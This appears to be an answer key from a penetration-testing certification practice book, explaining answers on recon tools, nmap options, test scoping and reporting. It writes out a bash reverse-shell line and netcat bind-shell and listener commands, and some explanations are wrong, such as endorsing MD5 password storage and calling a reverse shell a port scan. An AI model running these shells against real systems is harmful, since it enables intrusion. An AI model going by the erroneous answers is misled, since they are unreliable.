D. The Telnet protocol does not use encryption to protect network transmissions, which means authentication credentials to the remote system as well as the data being transferred are sent as plain text. To remedy this, you should recommend that the client use the Secure Shell (SSH) server and client for remote server access. SSH encrypts authentication information as well as data transfers between systems.

Answer 357

A

D. In a supply chain assessment, a penetration test is conducted on an organization’s vendors to ensure their networks are secure and can’t be used as a pivot point to compromise the organization itself. A goal-based assessment is designed to test a specific aspect of an organization’s security. A premerger test is usually conducted on an organization prior to it merging with another.

Answer 358

A

D. The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.

Answer 359

A

B. Nessus is a commercial vulnerability scanning tool used to scan a wide variety of devices and is not part of the tools available for OSINT gathering. There are a variety of tools that assist with this OSINT collection:
- Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.
- Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Microsoft Office documents, PDFs, and other common file formats.
- Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.
- Nslookup tools help identify the IP addresses associated with an organization.
- Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.
- Shodan is a specialized search engine to provide the discovery of vulnerable Internet of Things (IoT) devices from public sources.
- theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
- Whois tool gathers information from public records about domain ownership.

Answer 360

A

C. The Health Insurance Portability and Accountability Act of 1996 (HIPPA) is a U.S. legislation that requires data privacy and security provisions for safeguarding medical information. The law has emerged into greater importance recently with the explosion of health data breaches caused by cyberattacks and ransomware attacks on health insurers and providers.

Answer 361

A

A. A black box test is sometimes referred to as a zero knowledge assessment because the penetration testers have little or no knowledge of the client’s network. This type of assessment best emulates a real-world external attack.

Answer 362

A

C. A spear phishing attack was used in this scenario because the malicious email was specifically crafted for a specific employee. A generic phishing attack, on the other hand, would have been sent indiscriminately to a large group of employees within the organization.

Answer 363

A

D. The SAM database on a Windows system contains hashed passwords for local accounts. It is located in C:\Windows\System32\config\ by default. If a copy of this file can be made, it can be cracked using a number of different tools available on the Internet to expose the passwords it contains.

Answer 364

A

A. The –sS option causes the nmap utility to conduct a SYN port scan of the specified target system.

Answer 365

A

B. In this example, a downgrade man-in-the-middle attack has occurred because SSL 2.0 is less secure than TLS 1.2. Unless the user is exceptionally vigilant, they will likely not notice that SSL is being used to protect the session instead of TLS.

Answer 366

A

D. In this scenario, the tester has completed one phase of testing and is ready to move onto the next phase. This is called stages. During completion of a testing stage, the tester should contact the client and inform them of the completion of one stage and proceed to the next stage of testing.

Answer 367

A

A. Network access control (NAC) systems require network hosts to meet security policy requirements before being allowed to access the network, even if they have properly been connected to a network jack or associated with an access point. Unauthorized or unhealthy devices are usually placed on an isolated remediation network until they are authorized or until they are brought into compliance. After doing so, they are allowed to connect to the actual network segment.

Answer 368

A

D. During a penetration test, a tester may want to configure their scans to run as stealth scans. Stealth scans go to great lengths to avoid using tests that might attract attention. Service disruptions, error messages, and log entries caused by scans may attract attention from the cybersecurity team that causes them to adjust defenses in a manner that obstructs the penetration test. Using stealth scans better approximates the activity of a skilled attacker, resulting in a more realistic penetration test.

Answer 369

A

B. Lock bypass occurs when an attacker prevents a door’s locking mechanism from working. For example, this could be done by placing tape over the locking tab, as was done in this scenario.

Answer 370

A

D. In a white box test, you should have access to extensive internal documentation. Because an in-house developed application will be used as the attack vector, you should require the client to provide as much documentation about that application as possible. For example, you should ask for architectural diagrams, sample application requests, and the swagger document, as applicable.

Answer 371

A

D. The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.

Answer 372

A

A. Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.

Answer 373

A

A and C. Using an external team of contractors to perform penetration testing has several drawbacks that should be considered. First, there could be a potential for a conflict of interest if they also perform penetration testing for one of your competitors. Second, they tend to be quite expensive.

Answer 374

A

A and C. After a penetration test, it is critical that you undo everything you have done. For example, if you set up any shell sessions, especially reverse shells, you need to make sure that they are removed. In addition, you should document everything you do as you clean up after the test. It’s always possible that you may inadvertently break something during the cleanup process. If this happens, having documentation of what you did will be invaluable.

Answer 375

A

A. Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of technological mitigation strategies.

Answer 376

A

B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be as follows:
- Use multifactor authentication: Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism.
- Increase minimum password complexity: Complex passwords use different types of characters in unique ways to increase security making it harder for an attacker to crack.
- Enable full-disk encryption: Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

Answer 377

A

A. The –proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.

Answer 378

A

A. In this scenario, the penetration tester would need to receive the bands and frequencies used by the client’s wireless devices to proceed with the wireless penetration test. Wireless devices may operate on a number of bands and frequencies, and knowing the exact bands and frequencies would allow a penetration tester to conduct the wireless penetration test as requested.

Answer 379

A

A. Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.

Answer 380

A

A. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0-6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 3.6 and falls within the Low category.

Answer 381

A

D. A white box test is performed with full knowledge of the underlying technology, configuration, and settings of the target organization’s network. A gray box test may provide some information about the environment to the penetration testers without giving full access. In a black box test, the testers are not provided with access to or information about the target environment. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.

Answer 382

A

B. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, saving the file to an encrypted flash drive and storing it in a secured cabinet would make it more difficult for the report to be stolen than the other options listed.

Answer 383

A

A. The executive summary is the most important section of the report. Most times, it is the only section that many individuals will read, so it should be written in a manner that conveys all the important conclusions of the report in “layman’s terms,” in other words, in a clear manner that is understandable to everyone. The executive summary serves as a high-level view of both risk and business impact in plain English. Its purpose is to be concise and clear. It should be nontechnical so readers can review and gain insight into the security concerns that are highlighted in the report.

Answer 384

A

E. Because a black box test is being conducted in this scenario, the client’s network should be in “shields up” mode. The penetration testers should not have internal user accounts, nor should their systems be allowed to bypass NAC security controls. Certificate pinning should not be allowed.

Answer 385

A

C. Piggybacking attacks rely on following employees in through secured doors or other entrances. A high-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.

Answer 386

A

B. In this scenario, the best option to tell your colleague is that multifactor authentication is using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

Answer 387

A

C. In this example, the nmap utility was used to discover available targets. This is done by running nmap with the –sn option. This causes nmap to discover hosts, but not actually scan any of their ports.

Answer 388

A

A. Salting the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).

Answer 389

A

C and D. When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, …].

Answer 390

A

A and D. In this scenario, the value of compromising a vulnerable domain controller or a database server is much higher than the value of compromising an end user’s vulnerable workstation. For example, compromising a domain controller could expose multiple user accounts. Likewise, compromising a database server could expose valuable company information. On the other hand, the exposure created by a missing Windows feature update is probably minimal. Likewise, Linux provides a relatively high degree of system security, even on an older distribution.

Answer 391

A

B. The Web Application Description Language (WADL) provides an XML-based description of HTTP-based web services running on a web application server. WADL is typically used with Representational State Transfer (REST) web services. WADL is an alternative to WSDL and is generally considered easier to use but also lacks the flexibility associated with WSDL.

Answer 392

A

B. In a black box test, testers are not provided with any access to or information about the target. A white box test is performed with full knowledge of the underlying network. A gray box test may provide some information about the environment to the penetration testers without giving full access. Objective-based assessments are usually designed to assess the overall security of an organization.

Answer 393

A

B. A black box penetration test is called for in this scenario, so you will likely spend most of your time in the information gathering and vulnerability identification phase of the assessment. This is because, by definition, you should have little or no knowledge of the organization or its network prior to running the test.

Answer 394

A

D. In this scenario, the client does not have the budget to immediately correct all the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

Answer 395

A

A and D. Both APK Studio and APKX can be used to debug or even decompile an Android executable.

Answer 396

A

B. The Representational State Transfer (REST) web application architecture is based on the Hypertext Transfer Protocol (HTTP).

Answer 397

A

D. Red team assessments are typically more targeted than normal penetration tests. The red team acts like an attacker, targeting sensitive data or systems with the goal of acquiring access. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization, and compliance-based assessments are designed to test compliance with specific laws.

Answer 398

A

D. In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

Answer 399

A

A. Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.

Answer 400

A

A. In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

Answer 401

A

B. Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it.

Answer 402

A

A. In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed.
- Here’s a breakdown of the code:
- /bin/bash -i invokes an interactive bash shell.
- > &/dev/tcp// pipes that shell to the tester.
- 0&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).

Answer 403

A

A. Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.

Answer 404

A

B. Hacktivists may want to make a political or social point. Hacktivists aren’t typically doing attacks for money. They are individuals or groups of hackers who get together and see themselves as fighting for injustice. Hacktivists employ the same tools and tactics as hackers.

Answer 405

A

A. In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0–6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 10.0 and falls within the Critical category.

Answer 406

A

A and C. With a list of email addresses of users from the target organization, you could conduct any number of phishing exploits. You could also use the email addresses to enumerate internal user account names. In many (if not most) organizations, the email username is almost always the same as the user’s account name.

Answer 407

A

D. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for.

Answer 408

A

C. Because this is a mission-critical server, it may be a good idea to run a test scan in a lab environment before scanning the live system. This will help the tester assess the impact the scan will have before running it on the live system.

Answer 409

A

B and E. Mobile devices represent a significant security weakness in modern networks. Among the many issues associated with mobile devices, two that a penetration tester should be aware of the fact that they tend to be updated in an inconsistent manner. This is less of an issue with Apple devices because they have control of the hardware and software. However, this is a significant issue with Android devices. If you were to check the update level of a group of Android devices, you would likely not find two that are the same. In addition, some users root or jailbreak their devices so they can install apps outside of the approved store channels. This makes these devices susceptible to malware.

Answer 410

A

B. An ARP spoofing attack is classified as a man-in-the-middle attack.

Answer 411

A

A and B. Dumpster diving is a technique used to gather information about a target organization by reviewing documents found in its trash. Likewise, theHarvester can be used to search the Internet to find email addresses and employee names. This information can be used to craft an effective spear phishing campaign.

Answer 412

A

C and D. Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of PowerShell scripts that can be used to conduct a variety of exploits.

Answer 413

A

A. Many penetration testing tools may be covered by export restrictions. The United States prohibits the export of some types of software and hardware, including encryption tools. If you are traveling abroad with your penetration testing toolkit, you could be arrested if you have prohibited software or hardware in your possession.

Answer 414

A

A. The > relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.

Answer 415

A

A. Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.

Answer 416

A

B and E. As an employee of a security firm, you will likely to be asked by your employer to sign a nondisclosure agreement (NDA) and a noncompete agreement. The NDA specifies what each party in an agreement is allowed to disclose to third parties. Your employer likely doesn’t want you to reveal proprietary information to its competitors. The noncompete agreement requires you to agree to not work for a competitor or directly compete with your employer in a future job.

Answer 417

A

A. Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.

Answer 418

A

A. The –T1 option tells nmap to scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

Answer 419

A

A. You will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, you are telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Answer 420

A

A and C. You can use either tcpdump or Wireshark to capture packets on a wired network. Of the two, Wireshark is usually considered to have the most user-friendly interface.

Answer 421

A

A. The –oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.

Answer 422

A

A and C. The Server Message Block (SMB) protocol is used to share files and printers between hosts on a network.

Answer 423

A

B and E. The scope of this engagement in this scenario is limited to the internal network infrastructure. The organization’s ISP, Amazon Web Services, and their neighbor’s wireless networks are all owned by third parties and are therefore considered out of scope.

Answer 424

A

A. Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, a black box component has been added to a traditional gray box test.

Answer 425

A

C. A scope creep occurs when additional items are added to the scope of an assessment. The tester has gone beyond the scope of the initial assessment agreement.

Answer 426

A

B. Requiring IT staff members to pass a network security certification exam is an example of a people-based mitigation strategy.

Answer 427

A

A. In this example, the line that reads “250 2.1.5 Recipient OK” indicates that this is a valid email address within the target organization’s domain. However, it does not reveal who the address belongs to. All you know is that it is a legitimate email. To use it in the penetration test, you would first need to triangulate it against a list of company executives, such as is sometimes found on an organization’s website.

Answer 428

A

A. In this scenario, you could recommend that the application be rewritten such that all user inputs are sanitized before being submitted to the backend database. For example, suppose the application contains a field where users are supposed to enter their phone number. The programmers could validate that the information entered contains only numbers (and only the correct number for a phone number). This prevents malicious attackers from submitting SQL statements into these fields that could potentially expose the information in the database.

Answer 429

A

A. The Common Attack Pattern Enumeration and Classification (CAPEC) list is a resource intended to help identify and document attacks and attack patterns. Users are allowed to search attacks by their mechanism or domain and then break down each attack by various attributes and prerequisites. CAPEC also suggests solutions and mitigations, which is useful in identifying controls when writing a penetration test report.

Answer 430

A

A. By flooding the server with half-open TCP connections that never get completed, the tester makes it such that it doesn’t have enough resources to service legitimate network requests. Because only one host was used to conduct the stress test, this is an example of standard denial-of-service (DoS) attack.

Answer 431

A

B. The term de-escalation refers to the process of communication between the client and the tester to stop any exploitation being used during the penetration test because of the effects they may be having on the client’s network. In this scenario, the client was losing sales because of the website issues, so the testing needed to be stopped.

Answer 432

A

A. An attestation of findings is a document provided by the penetration testers to document that they conducted a test and the results for compliance purposes. It serves as record of the tester performing the penetration test. It includes a summary of the findings. Its intent is for external use, outside of your client’s organization, to show proof that a penetration test was performed and to highlight the test results.

Answer 433

A

C. The best way to defend against an SSL stripping attack is to implement an HTTP Strict Transport Security (HSTS) policy that prevents a user’s browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.

Answer 434

A

C. The first step in most penetration testing engagements is determining what should be tested, often called the scope of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.

Answer 435

A

D. The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

Answer 436

A

D. Because a white box assessment provides the penetration testers with extensive information about the target, it usually provides the most thorough assessment and typically requires the least amount of time to conduct. A gray box test is a blend of black box and white box testing. As such, it takes longer to conduct because more information must be discovered by the testers. In a black box test, the testers are not provided with access to or information about the target environment, which makes the assessment much less complete and takes much longer to conduct. Goals-based or objective-based assessments are usually designed to assess the overall security of an organization.

Answer 437

A

D. The National Vulnerability Database (NVD) website provides a summary of current security vulnerabilities ranked by their severity.

Answer 438

A

B. By scheduling the scan to run during a time of day when few people are at work, you can minimize the impact on available network bandwidth for production traffic, and you can also avoid being seen by internal network administrators.

Answer 439

A

B and C. The whois tool can be used to gather information about domain ownership from public records. The recon-ng utility is a modular web reconnaissance framework that organizes and manages OSINT information.

Answer 440

A

B. Computer Emergency Response Team (CERT) focuses on security breach and denial of service incidents, providing alerts and incident-handling and avoidance guidelines. CERT also conducts an ongoing public awareness campaign and engages in research aimed at improving security systems.

Answer 441

A

C. The penetration tester is using authority (and probably urgency along with fear) as a motivating factor. The sales rep may be inclined to create the VPN connection to prevent the supposed loss of an important client.

Answer 442

A

A. Advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 443

A

B. The testing agreement should contain a disclaimer indicating that the test is valid only at the point in time that it is conducted and that the scope and methodology requested by the client can impact the comprehensiveness of the test. An NDA specifies what each party in an agreement is allowed to disclose to third parties. An arbitration clause could still result in a settlement that goes against the pen test consultant. A SOW alone won’t protect you against this kind of lawsuit unless it contains a point-in-time clause, discussed earlier.

Answer 444

A

A. An RFID proximity reader can be used to prevent a user from authenticating to a system unless they are physically present at the system.

Answer 445

A

C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems. In this scenario, Kimberly has altered the authentication system by adding an unauthorized user account.

Answer 446

A

A. A company policy (corporate policy) is a documented set of guidelines, formulated after an analysis of all internal and external factors that can affect a firm’s objectives, operations, and plans. It is created by the company’s board of directors. Corporate policy lays down the company’s response to known and knowable situations and circumstances. It also determines the formulation and implementation of strategy and directs and restricts the plans, decisions, and actions of the company’s officers in achievement of its objectives. In this scenario, the corporate policy should be very detailed and specific; hence, the corporate systems must store passwords using the MD5 hashing algorithm.

Answer 447

A

A. In an SSL stripping attack, a user sends an HTTPS request to a web server. This is done to ensure that communications between the server and the browser are encrypted. However, the exploit fools the web server into thinking the user wants a standard HTTP connection, and an unencrypted session is established. Unless the user is watching carefully, the user may not realize that this has happened.

Answer 448

A

C. Utilities such as Telnet, rlogin, and rsh should be avoided when conducting a penetration test because they transmit data as clear text over the network. This makes it much easier for defenders to see what you are doing during the test, and you will likely get caught.

Answer 449

A

B. A malicious insider is typically an employee or a contractor that has been legitimately granted a degree of access to an organization’s information and systems. The malicious insider exploits this trust and uses it to compromise the organization’s information or systems.

Answer 450

A

A. A phishing attack was used in this scenario because the malicious email was sent indiscriminately to all the employees within the organization.

Answer 451

A

A. A stages communication trigger happens when the penetration test progresses from one phase to another.

Answer 452

A

B and C. Dynamic code analysis as well as fuzz testing are both performed on running code. Because the source code is not required to perform these tests, they can be performed during gray box or black box penetration tests.

Answer 453

A

D and E. If the client’s network itself is in scope, then you need to define the client’s wireless network SSIDs as in-scope. Defining the client’s IP address ranges as in-scope is also important. You must not target third parties, such as neighboring tenants or cloud service providers, without their written permission.

Answer 454

A

C. Penetration testers must take a different approach in their thinking. Instead of trying to defend against all possible threats, they only need to find a single vulnerability that they can exploit to achieve their goals. To find these vulnerabilities, they must think like an adversary who might attack the system in the real world. This approach is commonly known as adopting the hacker mind-set.

Answer 455

A

C. The fact that you don’t have administrative credentials doesn’t mean you have to forgo enumeration and fingerprinting nor does it mean you have to cancel the test. Instead, you could try to craft a spear phishing exploit to trick an internal user into revealing his or her logon credentials.

Answer 456

A

B. Typically, the technical constraints associated with a penetration test identify systems that can be tested and those that can’t be tested. For example, suppose the client uses automated robotic production equipment to make their products. This equipment is very expensive, and they may not want you to include it in the test.

Answer 457

A

D. The final report you write for a penetration test should include a section entitled Methodology. In this section, you describe the penetration testing methodology you used to conduct the test. In this scenario, this would be the appropriate place to indicate that the PCI DSS standard was followed to conduct the test.

Answer 458

A

B. A SMS phishing attack (also called a smishing attack) was used in this scenario. A smishing attack leverages text messaging instead of email to conduct a phishing exploit.

Answer 459

A

A. The nslookup command is included with most operating systems, including Windows and Linux, and can be used to resolve an organization’s domain name into its associated IP addresses.

Answer 460

A

D. Passive reconnaissance is also known as open-source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Answer 461

A

D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.

Answer 462

A

D. White box tests, sometimes called crystal box or full knowledge tests, allow testers to see everything inside a network. They are performed with full knowledge of the principal technologies, configurations, and settings that make up the target. Testers will typically have information including network diagrams, lists of systems and IP network ranges, and even credentials to the systems. White box tests are often more complete, as testers can get to every system, service, or other target that is in scope.

Answer 463

A

A. This is an example of a goal-based assessment. The goal is to verify the organization’s physical security using whatever means you desire. A premerger test is usually conducted on an organization prior to it merging with another. A compliance-based test is done to ensure that an organization remains in compliance with governmental regulations or corporate policies. A supply chain test involves testing an organization’s vendors.

Answer 464

A

A. In this example, you are assessing the client’s tolerance for impacts. By including this verbiage within the scope, you protect your organization from litigation if the penetration test truly does knock critical systems offline.

Answer 465

A

C. One of the key weaknesses with the FTP protocol is the fact that it transmits all data between the FTP server and the FTP client as clear text, including authentication credentials. By sniffing the FTP traffic, you may be able to capture FTP usernames and passwords. Some FTP server implementations leverage existing network user accounts and passwords to authenticate FTP connections. So, by capturing FTP authentication credentials, you could potentially be capturing internal network user accounts and passwords too.

Answer 466

A

A and D. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that the organization must monitor and audit all access to cardholder data and that access to that data must be restricted on a need-to-know basis.

Answer 467

A

C. When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them and what the client can do to fix the problem. In this example, you should recommend they install the MS17-010 – Critical update from Microsoft in this section.

Answer 468

A

C. In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@[]^_’{|}~. This will make it harder for attackers to break into your client’s system.

Answer 469

A

B. In this scenario, all the ports that the penetration tester discovered have to do with the Web. So, the answer for this question would be that sensitive information may be revealed on the web servers since those were the ports indicated during the vulnerability scan.
- Port 21 is TCP/FTP, or the control port.
- Port 80 is TCP/HTTP and used for transferring web pages.
- Port 443 is TCP/HTTPS, which is the HTTP Protocol over TLS/SSL, for encrypted transmission.

Answer 470

A

A and E. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can’t use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, as is penetrating the organization’s facility. On the other hand, job postings on the organization’s website as well as résumés of current employees on LinkedIn are both examples of public information. By reviewing these two sources, you may determine what types of systems the organization has deployed.

Answer 471

A

C and D. The device in this example is a little harder to analyze. You can clearly see that it is running a DNS server and a web server. However, not enough information is displayed here to infer much else. One possibility is that it is a wireless router that includes a caching-only DNS server and an embedded web server that is used to configure and manage the device. However, more information would be required to make this determination.

Answer 472

A

B and C. In a typical evil twin attack, the tester first conducts a deauthentication attack to disconnect victims’ wireless devices from the real network. These devices then automatically reconnect to the tester’s wireless access point that has been configured with the same SSID as the target organization. The tester will likely boost the gain on the evil twin’s radios because most wireless network interfaces will default to the access point with the strongest signal.

Answer 473

A

A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker is using the social engineering principle of authority. They were hoping that by the CFO receiving an email from the CEO, there would be no questions asked and the transfer would take place. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 474

A

A. The default ports used by an LDAP server are 389 (insecure) and 636 (secure). The LDAP protocol is used to query an LDAP-compliant directory server, such as Active Directory or eDirectory. Because directory information sent on port 389 is not encrypted, sniffing the traffic on this port could reveal user account information.

Answer 475

A

A and B. Either the dig axfr @nameserver target_domain or the host -t axfr target_domain nameserver command can be used to perform a zone transfer. If it works, then you can gather a fairly detailed list of all the network infrastructure hosts within the target network. Ideally, the target organization has disabled unauthenticated zone transfers on their DNS server. If this is the case, either of the previous commands will return some type of “Transfer Failed” error message.

Answer 476

A

D. Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user that might be malicious and then stores that input in a data store for later use.

Answer 477

A

B, C, and D. CompTIA highlights three important post-engagement cleanup activities:
- Removing any shells installed on systems during the penetration test
- Removing any tester-created accounts, credentials, or backdoors that were installed during testing
- Removing any tools that were installed during testing
- Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

Answer 478

A

B and C. Assigning an executable on Linux the SUID permission allows it to run with the permissions of the file’s owner. If the owner is the root user, then it will execute with root’s superuser permissions. Likewise, assigning an executable the SGID permission allows it to run with the permissions of the owning group. If the owning group is the root group, then it runs with the root group’s permissions.

Answer 479

A

D. This is an example of scope creep. Scope creep is the addition of additional parameters and/or targets to the scope of the assessment. This is a common occurrence and should be planned for in your initial scoping. For example, you and the client could agree on pricing and schedule adjustments that could be made if the scope of the test needs to expand.

Answer 480

A

C. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, wiping the drive will make it much harder to recover the files from the drive.

Answer 481

A

B. Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, the PCI DSS test is being modified to include testing for vulnerability for the new type of ransomware.

Answer 482

A

B and C. Your first response to the common theme of missing updates would to be to investigate whether this creates any vulnerabilities that you could exploit later in your penetration test. Then, you should document the common theme of missing updates so the client can update their best practices to make sure systems are kept up-to-date.

Answer 483

A

D. FIPS 140-2 is a U.S. government security standard that certifies cryptographic modules.

Answer 484

A

D. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate all subnets, hosts, and domains on the network.

Answer 485

A

A. The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying inexpensive flash drives will make it much harder to recover the data from the reports.

Answer 486

A

A and D. Sample application requests are typically used to test applications (desktop or web) that have been developed in-house. Applications developed in-house aren’t usually subjected to the same level of scrutiny as commercial applications, which make them possible attack vectors that can be exploited. Sample application requests aren’t generally required for commercial applications, such as Word, Excel, or Photoshop, because their weaknesses are already well-documented.

Answer 487

A

A. Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments:
- -l: Specifies listen mode, for inbound connections
- -p: Specifies a port to listen for a connection on
- -e: Tells what program to run once the port is connected to (cmd.exe)
- -v: Be verbose, printing out messages on standard error, such as when a connection occurs

Answer 488

A

C. Requiring a user to supply a biometric scan (something you are) along with a PIN (something you know) constitutes multifactor authentication.

Answer 489

A

B. A full scan interrogates each host discovered on the target network. Because it uses intrusive methods to do this, a full scan is usually detected (and possibly blocked) quickly by IDS or IPS devices.

Answer 490

A

E. None of the responses listed in this question can be reasonably inferred from the information displayed in Zenmap. You know that it is a Windows server and that it is most likely a domain controller, but you can’t infer much else from the information given.

Answer 491

A

